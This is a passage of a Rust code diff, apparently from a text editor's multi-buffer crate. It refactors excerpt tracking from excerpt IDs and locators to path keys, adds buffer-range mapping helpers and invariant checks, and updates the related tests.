+ diff_change_end_in_excerpt.min(excerpt_len); - excerpt_edits.push(Edit { - old: edit_start..edit_end, - new: edit_start..edit_end, - }); + continue; } + let diff_change_start_in_excerpt = diff_change_range + .start + .saturating_sub(excerpt_buffer_range.start); + let diff_change_end_in_excerpt = diff_change_range + .end + .saturating_sub(excerpt_buffer_range.start); + let edit_start = excerpt_start.len() + diff_change_start_in_excerpt.min(excerpt_len); + let edit_end = excerpt_start.len() + diff_change_end_in_excerpt.min(excerpt_len); + excerpt_edits.push(Edit { + old: edit_start..edit_end, + new: edit_start..edit_end, + }); } excerpt_edits } + + fn excerpts_for_path<'a>( + &'a self, + path_key: &'a PathKey, + ) -> impl Iterator> + 'a { + let mut cursor = 
self.excerpts.cursor::(()); + cursor.seek(path_key, Bias::Left); + cursor + .take_while(move |item| &item.path_key == path_key) + .map(|excerpt| excerpt.range.clone()) + } + + /// If the given multibuffer range is contained in a single excerpt and contains no deleted hunks, + /// returns the corresponding buffer range. + /// + /// Otherwise, returns None. + pub fn range_to_buffer_range( + &self, + range: Range, + ) -> Option<(&BufferSnapshot, Range)> + where + MBD: MultiBufferDimension + Ord + Sub + ops::AddAssign<::Output>, + MBD::TextDimension: AddAssign<::Output>, + { + let mut cursor = self.cursor::(); + cursor.seek(&range.start); + + let start_region = cursor.region()?.clone(); + + while let Some(region) = cursor.region() + && region.range.end < range.end + { + if !region.is_main_buffer { + return None; + } + cursor.next(); + } + + let end_region = cursor.region()?; + if end_region.buffer.remote_id() != start_region.buffer.remote_id() { + return None; + } + + let mut buffer_start = start_region.buffer_range.start; + buffer_start += range.start - start_region.range.start; + let mut buffer_end = end_region.buffer_range.start; + buffer_end += range.end - end_region.range.start; + + Some((start_region.buffer, buffer_start..buffer_end)) + } + + /// If the two endpoints of the range lie in the same excerpt, return the corresponding + /// buffer range. Intervening deleted hunks are allowed. 
+ pub fn anchor_range_to_buffer_anchor_range( + &self, + range: Range, + ) -> Option<(&BufferSnapshot, Range)> { + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(&range.start.seek_target(&self), Bias::Left); + + let start_excerpt = cursor.item()?; + + let snapshot = start_excerpt.buffer_snapshot(&self); + + cursor.seek(&range.end.seek_target(&self), Bias::Left); + + let end_excerpt = cursor.item()?; + + if start_excerpt != end_excerpt { + return None; + } + + if let Anchor::Excerpt(excerpt_anchor) = range.start + && (excerpt_anchor.path != start_excerpt.path_key_index + || excerpt_anchor.buffer_id() != snapshot.remote_id()) + { + return None; + } + if let Anchor::Excerpt(excerpt_anchor) = range.end + && (excerpt_anchor.path != end_excerpt.path_key_index + || excerpt_anchor.buffer_id() != snapshot.remote_id()) + { + return None; + } + + Some(( + snapshot, + range.start.text_anchor_in(snapshot)..range.end.text_anchor_in(snapshot), + )) + } + + /// Returns all nonempty intersections of the given buffer range with excerpts in the multibuffer in order. + /// + /// The multibuffer ranges are split to not intersect deleted hunks. 
+ pub fn buffer_range_to_excerpt_ranges( + &self, + range: Range, + ) -> impl Iterator> { + assert!(range.start.buffer_id == range.end.buffer_id); + + let buffer_id = range.start.buffer_id; + self.buffers + .get(&buffer_id) + .map(|buffer_state_snapshot| { + let path_key_index = buffer_state_snapshot.path_key_index; + let buffer_snapshot = &buffer_state_snapshot.buffer_snapshot; + let buffer_range = range.to_offset(buffer_snapshot); + + let start = Anchor::in_buffer(path_key_index, range.start).to_offset(self); + let mut cursor = self.cursor::(); + cursor.seek(&start); + std::iter::from_fn(move || { + while let Some(region) = cursor.region() + && !region.is_main_buffer + { + cursor.next(); + } + + let region = cursor.region()?; + if region.buffer.remote_id() != buffer_id + || region.buffer_range.start > BufferOffset(buffer_range.end) + { + return None; + } + + let start = region + .buffer_range + .start + .max(BufferOffset(buffer_range.start)); + let mut end = region.buffer_range.end.min(BufferOffset(buffer_range.end)); + + cursor.next(); + while let Some(region) = cursor.region() + && region.is_main_buffer + && region.buffer.remote_id() == buffer_id + && region.buffer_range.start <= end + { + end = end + .max(region.buffer_range.end) + .min(BufferOffset(buffer_range.end)); + cursor.next(); + } + + let multibuffer_range = Anchor::range_in_buffer( + path_key_index, + buffer_snapshot.anchor_range_inside(start..end), + ); + Some(multibuffer_range) + }) + }) + .into_iter() + .flatten() + } + + pub fn buffers_with_paths<'a>( + &'a self, + ) -> impl 'a + Iterator { + self.buffers + .values() + .map(|buffer| (&buffer.buffer_snapshot, &buffer.path_key)) + } + + /// Returns the number of graphemes in `range`. + /// + /// This counts user-visible characters like `e\u{301}` as one. 
+ pub fn grapheme_count_for_range(&self, range: &Range) -> usize { + self.text_for_range(range.clone()) + .collect::() + .graphemes(true) + .count() + } + + pub fn range_for_buffer(&self, buffer_id: BufferId) -> Option> { + let path_key = self.path_key_index_for_buffer(buffer_id)?; + let start = Anchor::in_buffer(path_key, text::Anchor::min_for_buffer(buffer_id)); + let end = Anchor::in_buffer(path_key, text::Anchor::max_for_buffer(buffer_id)); + Some((start..end).to_point(self)) + } } #[cfg(any(test, feature = "test-support"))] @@ -7250,27 +6755,74 @@ impl MultiBufferSnapshot { #[cfg(any(test, feature = "test-support"))] fn check_invariants(&self) { let excerpts = self.excerpts.items(()); - let excerpt_ids = self.excerpt_ids.items(()); + + let mut all_buffer_path_keys = HashSet::default(); + for buffer in self.buffers.values() { + let path_key = buffer.path_key.clone(); + assert!( + all_buffer_path_keys.insert(path_key), + "path key reused for multiple buffers: {:#?}", + self.buffers + ); + } + + let all_excerpt_path_keys = HashSet::from_iter(excerpts.iter().map(|e| e.path_key.clone())); for (ix, excerpt) in excerpts.iter().enumerate() { - if ix == 0 { - if excerpt.locator <= Locator::min() { - panic!("invalid first excerpt locator {:?}", excerpt.locator); + if ix > 0 { + let prev = &excerpts[ix - 1]; + + if excerpt.path_key < prev.path_key { + panic!("excerpt path_keys are out-of-order: {:#?}", excerpts); + } else if excerpt.path_key == prev.path_key { + assert_eq!( + excerpt.buffer_id, prev.buffer_id, + "excerpts with same path_key have different buffer_ids: {:#?}", + excerpts + ); + if excerpt + .start_anchor() + .cmp(&prev.end_anchor(), &self) + .is_le() + { + panic!("excerpt anchors are out-of-order: {:#?}", excerpts); + } + if excerpt + .start_anchor() + .cmp(&excerpt.end_anchor(), &self) + .is_ge() + { + panic!("excerpt with backward range: {:#?}", excerpts); + } } - } else if excerpt.locator <= excerpts[ix - 1].locator { - panic!("excerpts are 
out-of-order: {:?}", excerpts); } - } - for (ix, entry) in excerpt_ids.iter().enumerate() { - if ix == 0 { - if entry.id.cmp(&ExcerptId::min(), self).is_le() { - panic!("invalid first excerpt id {:?}", entry.id); - } - } else if entry.id <= excerpt_ids[ix - 1].id { - panic!("excerpt ids are out-of-order: {:?}", excerpt_ids); + if ix < excerpts.len() - 1 { + assert!( + excerpt.has_trailing_newline, + "non-trailing excerpt has no trailing newline: {:#?}", + excerpts + ); + } else { + assert!( + !excerpt.has_trailing_newline, + "trailing excerpt has trailing newline: {:#?}", + excerpts + ); } + assert!( + all_buffer_path_keys.contains(&excerpt.path_key), + "excerpt path key not found in active path keys: {:#?}", + excerpt.path_key + ); + assert_eq!( + self.path_keys_by_index.get(&excerpt.path_key_index), + Some(&excerpt.path_key), + "excerpt path key index does not match path key: {:#?}", + excerpt.path_key, + ); } + assert_eq!(all_buffer_path_keys, all_excerpt_path_keys); if self.diff_transforms.summary().input != self.excerpts.summary().text { panic!( @@ -7418,7 +6970,7 @@ where && self .excerpts .item() - .is_some_and(|excerpt| excerpt.id != hunk_info.excerpt_id) + .is_some_and(|excerpt| excerpt.end_anchor() != hunk_info.excerpt_end) { self.excerpts.next(); } @@ -7484,13 +7036,13 @@ where DiffTransform::DeletedHunk { hunk_info, .. 
} => self .excerpts .item() - .is_some_and(|excerpt| excerpt.id != hunk_info.excerpt_id), + .is_some_and(|excerpt| excerpt.end_anchor() != hunk_info.excerpt_end), }) } fn main_buffer_position(&self) -> Option { let excerpt = self.excerpts.item()?; - let buffer = &excerpt.buffer; + let buffer = excerpt.buffer_snapshot(self.snapshot); let buffer_context_start = excerpt.range.context.start.summary::(buffer); let mut buffer_start = buffer_context_start; let overshoot = self.diff_transforms.end().excerpt_dimension - *self.excerpts.start(); @@ -7498,6 +7050,19 @@ where Some(buffer_start) } + fn buffer_position_at(&self, output_position: &MBD) -> Option { + let excerpt = self.excerpts.item()?; + let buffer = excerpt.buffer_snapshot(self.snapshot); + let buffer_context_start = excerpt.range.context.start.summary::(buffer); + let mut excerpt_offset = self.diff_transforms.start().excerpt_dimension; + if let Some(DiffTransform::BufferContent { .. }) = self.diff_transforms.item() { + excerpt_offset += *output_position - self.diff_transforms.start().output_dimension.0; + } + let mut result = buffer_context_start; + result += excerpt_offset - *self.excerpts.start(); + Some(result) + } + fn build_region(&self) -> Option> { let excerpt = self.excerpts.item()?; match self.diff_transforms.item()? { @@ -7508,7 +7073,7 @@ where hunk_info, .. } => { - let diff = self.diffs.get(buffer_id)?; + let diff = find_diff_state(&self.snapshot.diffs, *buffer_id)?; let buffer = diff.base_text(); let mut rope_cursor = buffer.as_rope().cursor(0); let buffer_start = rope_cursor.summary::(base_text_byte_range.start); @@ -7532,7 +7097,7 @@ where DiffTransform::BufferContent { inserted_hunk_info, .. 
} => { - let buffer = &excerpt.buffer; + let buffer = excerpt.buffer_snapshot(self.snapshot); let buffer_context_start = excerpt.range.context.start.summary::(buffer); let mut start = self.diff_transforms.start().output_dimension.0; @@ -7626,28 +7191,47 @@ where impl Excerpt { fn new( - id: ExcerptId, - locator: Locator, - buffer_id: BufferId, - buffer: Arc, + path_key: PathKey, + path_key_index: PathKeyIndex, + buffer_snapshot: &BufferSnapshot, range: ExcerptRange, has_trailing_newline: bool, ) -> Self { Excerpt { - id, - locator, - max_buffer_row: range.context.end.to_point(&buffer).row, - text_summary: buffer - .text_summary_for_range::(range.context.to_offset(&buffer)), - buffer_id, - buffer, + path_key, + path_key_index, + buffer_id: buffer_snapshot.remote_id(), + max_buffer_row: range.context.end.to_point(&buffer_snapshot).row, + text_summary: buffer_snapshot.text_summary_for_range::( + range.context.to_offset(&buffer_snapshot), + ), range, has_trailing_newline, } } - fn chunks_in_range(&self, range: Range, language_aware: bool) -> ExcerptChunks<'_> { - let content_start = self.range.context.start.to_offset(&self.buffer); + fn buffer_snapshot<'a>(&self, snapshot: &'a MultiBufferSnapshot) -> &'a BufferSnapshot { + &snapshot + .buffers + .get(&self.buffer_id) + .expect("buffer snapshot not found for excerpt") + .buffer_snapshot + } + + fn buffer(&self, multibuffer: &MultiBuffer) -> Entity { + multibuffer + .buffer(self.buffer_id) + .expect("buffer entity not found for excerpt") + } + + fn chunks_in_range<'a>( + &'a self, + range: Range, + language_aware: bool, + snapshot: &'a MultiBufferSnapshot, + ) -> ExcerptChunks<'a> { + let buffer = self.buffer_snapshot(snapshot); + let content_start = self.range.context.start.to_offset(buffer); let chunks_start = content_start + range.start; let chunks_end = content_start + cmp::min(range.end, self.text_summary.len); @@ -7655,17 +7239,23 @@ impl Excerpt { && range.start <= self.text_summary.len && range.end > 
self.text_summary.len; - let content_chunks = self.buffer.chunks(chunks_start..chunks_end, language_aware); + let content_chunks = buffer.chunks(chunks_start..chunks_end, language_aware); ExcerptChunks { - excerpt_id: self.id, content_chunks, has_footer, + end: self.end_anchor(), } } - fn seek_chunks(&self, excerpt_chunks: &mut ExcerptChunks, range: Range) { - let content_start = self.range.context.start.to_offset(&self.buffer); + fn seek_chunks( + &self, + excerpt_chunks: &mut ExcerptChunks, + range: Range, + snapshot: &MultiBufferSnapshot, + ) { + let buffer = self.buffer_snapshot(snapshot); + let content_start = self.range.context.start.to_offset(buffer); let chunks_start = content_start + range.start; let chunks_end = content_start + cmp::min(range.end, self.text_summary.len); excerpt_chunks.content_chunks.seek(chunks_start..chunks_end); @@ -7674,218 +7264,43 @@ impl Excerpt { && range.end > self.text_summary.len; } - fn clip_anchor(&self, text_anchor: text::Anchor) -> text::Anchor { - if text_anchor - .cmp(&self.range.context.start, &self.buffer) - .is_lt() - { + fn clip_anchor( + &self, + text_anchor: text::Anchor, + snapshot: &MultiBufferSnapshot, + ) -> text::Anchor { + let buffer = self.buffer_snapshot(snapshot); + if text_anchor.cmp(&self.range.context.start, buffer).is_lt() { self.range.context.start - } else if text_anchor - .cmp(&self.range.context.end, &self.buffer) - .is_gt() - { + } else if text_anchor.cmp(&self.range.context.end, buffer).is_gt() { self.range.context.end } else { text_anchor } } - fn contains(&self, anchor: &Anchor) -> bool { - (anchor.text_anchor.buffer_id == None - || anchor.text_anchor.buffer_id == Some(self.buffer_id)) + pub(crate) fn contains(&self, anchor: &ExcerptAnchor, snapshot: &MultiBufferSnapshot) -> bool { + self.path_key_index == anchor.path + && self.buffer_id == anchor.text_anchor.buffer_id && self .range - .context - .start - .cmp(&anchor.text_anchor, &self.buffer) - .is_le() - && self - .range - .context - .end - 
.cmp(&anchor.text_anchor, &self.buffer) - .is_ge() - } - - /// The [`Excerpt`]'s start offset in its [`Buffer`] - fn buffer_start_offset(&self) -> BufferOffset { - BufferOffset(self.range.context.start.to_offset(&self.buffer)) - } - - /// The [`Excerpt`]'s end offset in its [`Buffer`] - fn buffer_end_offset(&self) -> BufferOffset { - self.buffer_start_offset() + self.text_summary.len - } -} - -impl<'a> MultiBufferExcerpt<'a> { - pub fn id(&self) -> ExcerptId { - self.excerpt.id - } - - pub fn buffer_id(&self) -> BufferId { - self.excerpt.buffer_id - } - - pub fn start_anchor(&self) -> Anchor { - Anchor::in_buffer(self.excerpt.id, self.excerpt.range.context.start) - } - - pub fn end_anchor(&self) -> Anchor { - Anchor::in_buffer(self.excerpt.id, self.excerpt.range.context.end) + .contains(&anchor.text_anchor(), self.buffer_snapshot(snapshot)) } - pub fn buffer(&self) -> &'a BufferSnapshot { - &self.excerpt.buffer + fn start_anchor(&self) -> ExcerptAnchor { + ExcerptAnchor::in_buffer(self.path_key_index, self.range.context.start) } - pub fn buffer_range(&self) -> Range { - self.buffer_offset - ..BufferOffset( - self.excerpt - .range - .context - .end - .to_offset(&self.excerpt.buffer.text), - ) - } - - pub fn start_offset(&self) -> MultiBufferOffset { - self.offset - } - - /// Maps an offset within the [`MultiBuffer`] to an offset within the [`Buffer`] - pub fn map_offset_to_buffer(&mut self, offset: MultiBufferOffset) -> BufferOffset { - self.map_range_to_buffer(offset..offset).start - } - - /// Maps a range within the [`MultiBuffer`] to a range within the [`Buffer`] - pub fn map_range_to_buffer(&mut self, range: Range) -> Range { - self.diff_transforms - .seek(&OutputDimension(range.start), Bias::Right); - let start = self.map_offset_to_buffer_internal(range.start); - let end = if range.end > range.start { - self.diff_transforms - .seek_forward(&OutputDimension(range.end), Bias::Right); - self.map_offset_to_buffer_internal(range.end) - } else { - start - }; - 
start..end - } - - fn map_offset_to_buffer_internal(&self, offset: MultiBufferOffset) -> BufferOffset { - let mut excerpt_offset = self.diff_transforms.start().excerpt_dimension; - if let Some(DiffTransform::BufferContent { .. }) = self.diff_transforms.item() { - excerpt_offset += offset - self.diff_transforms.start().output_dimension.0; - }; - let offset_in_excerpt = excerpt_offset.saturating_sub(self.excerpt_offset); - self.buffer_offset + offset_in_excerpt - } - - /// Map an offset within the [`Buffer`] to an offset within the [`MultiBuffer`] - pub fn map_offset_from_buffer(&mut self, buffer_offset: BufferOffset) -> MultiBufferOffset { - self.map_range_from_buffer(buffer_offset..buffer_offset) - .start - } - - /// Map a range within the [`Buffer`] to a range within the [`MultiBuffer`] - pub fn map_range_from_buffer( - &mut self, - buffer_range: Range, - ) -> Range { - if buffer_range.start < self.buffer_offset { - log::warn!( - "Attempting to map a range from a buffer offset that starts before the current buffer offset" - ); - return self.offset..self.offset; - } - let overshoot = buffer_range.start - self.buffer_offset; - let excerpt_offset = self.excerpt_offset + overshoot; - let excerpt_seek_dim = excerpt_offset; - self.diff_transforms.seek(&excerpt_seek_dim, Bias::Right); - if self.diff_transforms.start().excerpt_dimension > excerpt_offset { - log::warn!( - "Attempting to map a range from a buffer offset that starts before the current buffer offset" - ); - return self.offset..self.offset; - } - let overshoot = excerpt_offset - self.diff_transforms.start().excerpt_dimension; - let start = self.diff_transforms.start().output_dimension.0 + overshoot; - - let end = if buffer_range.start < buffer_range.end { - let overshoot = buffer_range.end - self.buffer_offset; - let excerpt_offset = self.excerpt_offset + overshoot; - let excerpt_seek_dim = excerpt_offset; - self.diff_transforms - .seek_forward(&excerpt_seek_dim, Bias::Right); - let overshoot = excerpt_offset 
- self.diff_transforms.start().excerpt_dimension; - // todo(lw): Clamp end to the excerpt boundaries - self.diff_transforms.start().output_dimension.0 + overshoot - } else { - start - }; - - start..end - } - - /// Returns true if the entirety of the given range is in the buffer's excerpt - pub fn contains_buffer_range(&self, range: Range) -> bool { - range.start >= self.excerpt.buffer_start_offset() - && range.end <= self.excerpt.buffer_end_offset() - } - - /// Returns true if any part of the given range is in the buffer's excerpt - pub fn contains_partial_buffer_range(&self, range: Range) -> bool { - range.start <= self.excerpt.buffer_end_offset() - && range.end >= self.excerpt.buffer_start_offset() - } - - pub fn max_buffer_row(&self) -> u32 { - self.excerpt.max_buffer_row - } -} - -impl ExcerptId { - pub fn min() -> Self { - Self(0) - } - - pub fn max() -> Self { - Self(u32::MAX) - } - - pub fn to_proto(self) -> u64 { - self.0 as _ - } - - pub fn from_proto(proto: u64) -> Self { - Self(proto as _) - } - - pub fn cmp(&self, other: &Self, snapshot: &MultiBufferSnapshot) -> cmp::Ordering { - let a = snapshot.excerpt_locator_for_id(*self); - let b = snapshot.excerpt_locator_for_id(*other); - a.cmp(b).then_with(|| self.0.cmp(&other.0)) - } -} - -impl From for usize { - fn from(val: ExcerptId) -> Self { - val.0 as usize + fn end_anchor(&self) -> ExcerptAnchor { + ExcerptAnchor::in_buffer(self.path_key_index, self.range.context.end) } } -impl fmt::Debug for Excerpt { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - f.debug_struct("Excerpt") - .field("id", &self.id) - .field("locator", &self.locator) - .field("buffer_id", &self.buffer_id) - .field("range", &self.range) - .field("text_summary", &self.text_summary) - .field("has_trailing_newline", &self.has_trailing_newline) - .finish() +impl PartialEq for Excerpt { + fn eq(&self, other: &Self) -> bool { + self.path_key_index == other.path_key_index + && self.buffer_id == other.buffer_id + && 
self.range.context == other.range.context } } @@ -7898,8 +7313,8 @@ impl sum_tree::Item for Excerpt { text += TextSummary::from("\n"); } ExcerptSummary { - excerpt_id: self.id, - excerpt_locator: self.locator.clone(), + path_key: self.path_key.clone(), + max_anchor: Some(self.range.context.end), widest_line_number: self.max_buffer_row, text: text.into(), count: 1, @@ -7907,22 +7322,6 @@ impl sum_tree::Item for Excerpt { } } -impl sum_tree::Item for ExcerptIdMapping { - type Summary = ExcerptId; - - fn summary(&self, _cx: ()) -> Self::Summary { - self.id - } -} - -impl sum_tree::KeyedItem for ExcerptIdMapping { - type Key = ExcerptId; - - fn key(&self) -> Self::Key { - self.id - } -} - impl DiffTransform { fn hunk_info(&self) -> Option { match self { @@ -7971,45 +7370,98 @@ impl sum_tree::ContextLessSummary for DiffTransformSummary { } } -impl sum_tree::ContextLessSummary for ExcerptId { - fn zero() -> Self { - Self(0) +impl sum_tree::Dimension<'_, ExcerptSummary> for PathKey { + fn zero(_: ::Context<'_>) -> Self { + PathKey::min() } - fn add_summary(&mut self, summary: &Self) { - *self = cmp::max(*self, *summary); + fn add_summary( + &mut self, + summary: &'_ ExcerptSummary, + _cx: ::Context<'_>, + ) { + *self = summary.path_key.clone(); + } +} + +impl sum_tree::Dimension<'_, ExcerptSummary> for MultiBufferOffset { + fn zero(_: ::Context<'_>) -> Self { + MultiBufferOffset::ZERO + } + + fn add_summary( + &mut self, + summary: &'_ ExcerptSummary, + _cx: ::Context<'_>, + ) { + *self += summary.text.len } } impl sum_tree::ContextLessSummary for ExcerptSummary { fn zero() -> Self { - Self::default() + Self::min() } fn add_summary(&mut self, summary: &Self) { debug_assert!( - summary.excerpt_locator > self.excerpt_locator - || self.excerpt_locator == Locator::min(), - "Excerpt locators must be in ascending order: {:?} > {:?}", - summary.excerpt_locator, - self.excerpt_locator + summary.path_key >= self.path_key, + "Path keys must be in ascending order: {:?} > {:?}", + 
summary.path_key, + self.path_key ); - self.excerpt_locator = summary.excerpt_locator.clone(); + + self.path_key = summary.path_key.clone(); + self.max_anchor = summary.max_anchor; self.text += summary.text; self.widest_line_number = cmp::max(self.widest_line_number, summary.widest_line_number); self.count += summary.count; } } -impl<'a> sum_tree::SeekTarget<'a, ExcerptSummary, Option<&'a Locator>> for Locator { - fn cmp(&self, cursor_location: &Option<&'a Locator>, _: ()) -> cmp::Ordering { - Ord::cmp(&Some(self), cursor_location) +impl sum_tree::SeekTarget<'_, ExcerptSummary, ExcerptSummary> for AnchorSeekTarget { + fn cmp( + &self, + cursor_location: &ExcerptSummary, + _cx: ::Context<'_>, + ) -> cmp::Ordering { + match self { + AnchorSeekTarget::Excerpt { + path_key, + anchor, + snapshot, + } => { + let path_comparison = Ord::cmp(path_key, &cursor_location.path_key); + if path_comparison.is_ne() { + path_comparison + } else if let Some(snapshot) = snapshot { + if anchor.text_anchor.buffer_id != snapshot.remote_id() { + Ordering::Greater + } else if let Some(max_anchor) = cursor_location.max_anchor { + debug_assert_eq!(max_anchor.buffer_id, snapshot.remote_id()); + anchor.text_anchor().cmp(&max_anchor, snapshot) + } else { + Ordering::Greater + } + } else { + // shouldn't happen because we expect this buffer not to have any excerpts + // (otherwise snapshot would have been Some) + Ordering::Equal + } + } + // This should be dead code because Empty is only constructed for an empty snapshot + AnchorSeekTarget::Empty => Ordering::Equal, + } } } -impl sum_tree::SeekTarget<'_, ExcerptSummary, ExcerptSummary> for Locator { - fn cmp(&self, cursor_location: &ExcerptSummary, _: ()) -> cmp::Ordering { - Ord::cmp(self, &cursor_location.excerpt_locator) +impl sum_tree::SeekTarget<'_, ExcerptSummary, ExcerptSummary> for PathKey { + fn cmp( + &self, + cursor_location: &ExcerptSummary, + _cx: ::Context<'_>, + ) -> cmp::Ordering { + Ord::cmp(self, &cursor_location.path_key) } } 
@@ -8026,26 +7478,6 @@ where } } -impl<'a> sum_tree::Dimension<'a, ExcerptSummary> for Option<&'a Locator> { - fn zero(_cx: ()) -> Self { - Default::default() - } - - fn add_summary(&mut self, summary: &'a ExcerptSummary, _: ()) { - *self = Some(&summary.excerpt_locator); - } -} - -impl<'a> sum_tree::Dimension<'a, ExcerptSummary> for Option { - fn zero(_cx: ()) -> Self { - Default::default() - } - - fn add_summary(&mut self, summary: &'a ExcerptSummary, _: ()) { - *self = Some(summary.excerpt_id); - } -} - #[derive(Copy, Clone, PartialOrd, Ord, Eq, PartialEq, Debug)] struct OutputDimension(T); @@ -8101,7 +7533,7 @@ where } } -#[derive(Copy, Clone, PartialOrd, Ord, Eq, PartialEq, Debug)] +#[derive(Copy, Clone, PartialOrd, Ord, Eq, PartialEq, Debug, Default)] struct ExcerptDimension(T); impl PartialEq for ExcerptDimension { @@ -8261,18 +7693,14 @@ impl Iterator for MultiBufferRows<'_> { .excerpts .item() .or(self.cursor.excerpts.prev_item())?; - let last_row = last_excerpt - .range - .context - .end - .to_point(&last_excerpt.buffer) - .row; + let buffer_snapshot = last_excerpt.buffer_snapshot(self.cursor.snapshot); + let last_row = last_excerpt.range.context.end.to_point(buffer_snapshot).row; let first_row = last_excerpt .range .context .start - .to_point(&last_excerpt.buffer) + .to_point(buffer_snapshot) .row; let expand_info = if self.is_singleton { @@ -8281,7 +7709,7 @@ impl Iterator for MultiBufferRows<'_> { let needs_expand_up = first_row == last_row && last_row > 0 && !region.diff_hunk_status.is_some_and(|d| d.is_deleted()); - let needs_expand_down = last_row < last_excerpt.buffer.max_point().row; + let needs_expand_down = last_row < buffer_snapshot.max_point().row; if needs_expand_up && needs_expand_down { Some(ExpandExcerptDirection::UpAndDown) @@ -8294,7 +7722,7 @@ impl Iterator for MultiBufferRows<'_> { } .map(|direction| ExpandInfo { direction, - excerpt_id: last_excerpt.id, + start_anchor: Anchor::Excerpt(last_excerpt.start_anchor()), }) }; self.point += 
Point::new(1, 0); @@ -8336,7 +7764,7 @@ impl Iterator for MultiBufferRows<'_> { } .map(|direction| ExpandInfo { direction, - excerpt_id: region.excerpt.id, + start_anchor: Anchor::Excerpt(region.excerpt.start_anchor()), }) }; @@ -8388,18 +7816,20 @@ impl<'a> MultiBufferChunks<'a> { if let Some(excerpt_chunks) = self .excerpt_chunks .as_mut() - .filter(|chunks| excerpt.id == chunks.excerpt_id) + .filter(|chunks| excerpt.end_anchor() == chunks.end) { excerpt.seek_chunks( excerpt_chunks, (self.excerpt_offset_range.start - excerpt_start) ..(self.excerpt_offset_range.end - excerpt_start), + self.snapshot, ); } else { self.excerpt_chunks = Some(excerpt.chunks_in_range( (self.excerpt_offset_range.start - excerpt_start) ..(self.excerpt_offset_range.end - excerpt_start), self.language_aware, + self.snapshot, )); } } else { @@ -8421,6 +7851,7 @@ impl<'a> MultiBufferChunks<'a> { self.excerpt_chunks = Some(excerpt.chunks_in_range( 0..(self.excerpt_offset_range.end - *self.excerpts.start()), self.language_aware, + self.snapshot, )); } } @@ -8536,7 +7967,8 @@ impl<'a> Iterator for MultiBufferChunks<'a> { } chunks } else { - let base_buffer = &self.diffs.get(buffer_id)?.base_text(); + let base_buffer = + &find_diff_state(&self.snapshot.diffs, *buffer_id)?.base_text(); base_buffer.chunks(base_text_start..base_text_end, self.language_aware) }; @@ -8733,12 +8165,6 @@ impl ToPoint for PointUtf16 { } } -impl From for EntityId { - fn from(id: ExcerptId) -> Self { - EntityId::from(id.0 as u64) - } -} - #[cfg(debug_assertions)] pub mod debug { use super::*; diff --git a/crates/multi_buffer/src/multi_buffer_tests.rs b/crates/multi_buffer/src/multi_buffer_tests.rs index 7e27786a76a14783f54e42c73850a888e87a3ac7..bc904d1a05488ee365ebddf36c3b30accdfb9301 100644 --- a/crates/multi_buffer/src/multi_buffer_tests.rs +++ b/crates/multi_buffer/src/multi_buffer_tests.rs @@ -72,6 +72,27 @@ fn test_singleton(cx: &mut App) { assert_consistent_line_numbers(&snapshot); } +#[gpui::test] +fn 
test_buffer_point_to_anchor_at_end_of_singleton_buffer(cx: &mut App) { + let buffer = cx.new(|cx| Buffer::local("abc", cx)); + let multibuffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx)); + + let anchor = multibuffer + .read(cx) + .buffer_point_to_anchor(&buffer, Point::new(0, 3), cx) + .unwrap(); + let (anchor, _) = multibuffer + .read(cx) + .snapshot(cx) + .anchor_to_buffer_anchor(anchor) + .unwrap(); + + assert_eq!( + anchor, + buffer.read(cx).snapshot().anchor_after(Point::new(0, 3)), + ); +} + #[gpui::test] fn test_remote(cx: &mut App) { let host_buffer = cx.new(|cx| Buffer::local("a", cx)); @@ -171,12 +192,15 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) { &[ Event::Edited { edited_buffer: None, + is_local: true, }, Event::Edited { edited_buffer: None, + is_local: true, }, Event::Edited { edited_buffer: None, + is_local: true, } ] ); @@ -319,7 +343,7 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) { ); let snapshot = multibuffer.update(cx, |multibuffer, cx| { - multibuffer.remove_excerpts_for_path(PathKey::sorted(1), cx); + multibuffer.remove_excerpts(PathKey::sorted(1), cx); multibuffer.snapshot(cx) }); @@ -346,7 +370,7 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) { boundary.row, boundary .next - .buffer + .buffer(snapshot) .text_for_range(boundary.next.range.context) .collect::(), starts_new_buffer, @@ -413,7 +437,7 @@ async fn test_diff_hunks_in_range(cx: &mut TestAppContext) { multibuffer.update(cx, |multibuffer, cx| { multibuffer.add_diff(diff, cx); - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -453,7 +477,7 @@ async fn test_diff_hunks_in_range(cx: &mut TestAppContext) { ); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ 
-494,7 +518,7 @@ async fn test_diff_hunks_in_range_query_starting_at_added_row(cx: &mut TestAppCo multibuffer.update(cx, |multibuffer, cx| { multibuffer.add_diff(diff, cx); - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -739,12 +763,27 @@ fn test_excerpt_events(cx: &mut App) { cx.subscribe( &leader_multibuffer, move |follower, _, event, cx| match event.clone() { - Event::ExcerptsAdded { + Event::BufferRangesUpdated { buffer, - predecessor, - excerpts, - } => follower.insert_excerpts_with_ids_after(predecessor, buffer, excerpts, cx), - Event::ExcerptsRemoved { ids, .. } => follower.remove_excerpts(ids, cx), + path_key, + ranges, + } => { + let buffer_snapshot = buffer.read(cx).snapshot(); + follower.set_merged_excerpt_ranges_for_path( + path_key, + buffer, + &buffer_snapshot, + ranges, + cx, + ); + } + Event::BuffersRemoved { + removed_buffer_ids, .. + } => { + for id in removed_buffer_ids { + follower.remove_excerpts_for_buffer(id, cx); + } + } Event::Edited { .. 
